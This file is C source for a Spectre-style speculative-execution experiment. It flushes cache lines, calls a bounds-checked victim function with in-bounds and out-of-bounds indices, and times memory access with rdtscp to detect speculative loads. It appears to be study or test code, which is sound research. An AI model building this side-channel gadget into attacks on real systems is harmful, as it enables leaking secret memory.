1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
|
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <x86intrin.h> /* for rdtscp and clflush */
/********************************************************************
Victim code.
********************************************************************/
unsigned int array1_size = 16;
uint8_t unused1[64];
uint8_t array1[640] = {};
uint8_t temp;
void victim_function(size_t x) {
if (x < array1_size) {
temp &= array1[x];
}
}
/********************************************************************
Analysis code
********************************************************************/
size_t malicious_x = 128;//index to array1
#define CACHE_HIT_THRESHOLD (80) /* assume cache hit if time <= threshold */
/* Report best guess in value[0] and runner-up in value[1] */
void testSpec(size_t fetch_index) {
int tries, i, j, k, mix_i, junk = 0;
register uint64_t time1, time2;
volatile uint8_t * addr;
for (tries = 20; tries > 0; tries--) {
_mm_clflush( & array1_size); //make branch resolved sloowly
_mm_clflush( array1+malicious_x ); //flush out-of-boundary address
_mm_clflush( array1+fetch_index ); //flush within-boundary address
for (volatile int z = 0; z < 1000; z++) {} /* Delay (can also mfence) */
/*fetch one element in the array*/
victim_function(fetch_index);
for (volatile int z = 0; z < 1000; z++) {} /* Delay (can also mfence) */
time1 = __rdtscp( &junk );
time1 = __rdtscp( &junk );
addr = array1 + malicious_x;
junk = * addr; // MEMORY ACCESS TO TIME
time2 = __rdtscp( &junk ) - time1; // READ TIMER & COMPUTE ELAPSED TIME
time2 = __rdtscp( &junk ) - time1; // READ TIMER & COMPUTE ELAPSED TIME
printf("time = %ld\n", time2);
}
}
int main(int argc, const char * * argv) {
printf("malicious_x = %p... ", (void * ) malicious_x);
printf("fetch 0th element, \nno misprediction, \nsuppose to see miss + no squash\n");
testSpec(0);
printf("fetch malicious_x, \nmispredict with speculative load, \nsuppose to see hit + squash\n");
testSpec(malicious_x);
printf("fetch malicious_x * 2, \nmispredict with speculative load different address, \nsuppose to see miss + squash\n");
testSpec(malicious_x*2);
return (0);
}
|